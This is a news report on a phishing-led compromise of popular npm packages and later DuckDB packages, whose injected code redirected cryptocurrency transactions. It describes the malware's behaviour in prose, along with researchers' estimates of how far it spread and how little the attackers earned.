The largest attack in the history of the npm ecosystem affected about 10% of cloud environments. However, experts concluded that the attackers made practically nothing from this breach.
The attack occurred earlier this week and affected around 20 of the most popular npm packages, which collectively account for more than 2.6 billion weekly downloads (including libraries such as chalk, debug, and ansi-styles).
The breach began when, during a phishing attack, hackers compromised the credentials of maintainer and developer Josh Junon, also known as Qix. After gaining access, the attackers updated popular packages, hiding malicious code that stole cryptocurrency by redirecting victims’ assets to the attackers’ own addresses.
As we noted earlier, the community quickly detected the attack, and all malicious packages were removed within a matter of hours.
As analysts at Wiz now report, one or more of the compromised packages, which are foundational to practically any JavaScript and Node.js project, were used in 99% of cloud environments.
In the few hours when the malicious package versions were available for download, they were downloaded in roughly 10% of cloud environments. It’s worth noting that these figures are based on data from the cloud environments of Wiz’s customers, as well as information from open sources.
“During the brief two-hour window when the malicious versions were available on npm, the malicious code successfully made its way into one in ten cloud environments. This demonstrates how quickly malicious code can spread in supply-chain attacks like this,” the researchers write.
Although this attack caused noticeable disruptions, and companies spent considerable time on recovery and audits, the security impact turned out to be negligible — as was the attackers’ profit.
Earlier this week, researchers suggested the attack didn’t go quite as planned and that the hackers made virtually no “earnings.” According to an analysis by Security Alliance, the injected malicious code targeted the browser environment and intercepted Ethereum and Solana signing requests, substituting cryptocurrency wallet addresses with ones controlled by the attackers.
It was precisely the attackers’ choice to opt for plain cryptojacking that spared the affected companies from more serious consequences. After all, the intruders could have used the access they gained to implant reverse shells, move laterally within victims’ networks, or deploy ransomware and destructive wiper malware.
As Security Alliance explained, the malicious code checked for the presence of window.ethereum and, if found, interfered with core Ethereum transaction functions. Calls to approve, permit, transfer, and transferFrom were silently redirected to the wallet 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976. Any Ethereum transactions with the specified amount but without additional data were also redirected. In the case of Solana, the malware replaced recipient addresses with an invalid string starting with “1911…,” which completely broke transfers.
As noted on the day of the attack, it appears the attackers weren’t substituting their own cryptocurrency wallets, but rather the addresses of Uniswap and other swap contracts (instead of the real recipients’ addresses). As a result, the hackers “made” anywhere from a few cents to $50, according to researchers’ estimates.
According to experts at Socket, the same hackers later compromised the DuckDB maintainer’s account and the project’s packages, injecting the same crypto-stealing code into them.
But even this breach brought the attackers, who didn’t even alter the payload, only $429 in Ethereum, $46 in Solana, and small amounts in BTC, Tron, BCH, and LTC—for a total of $600.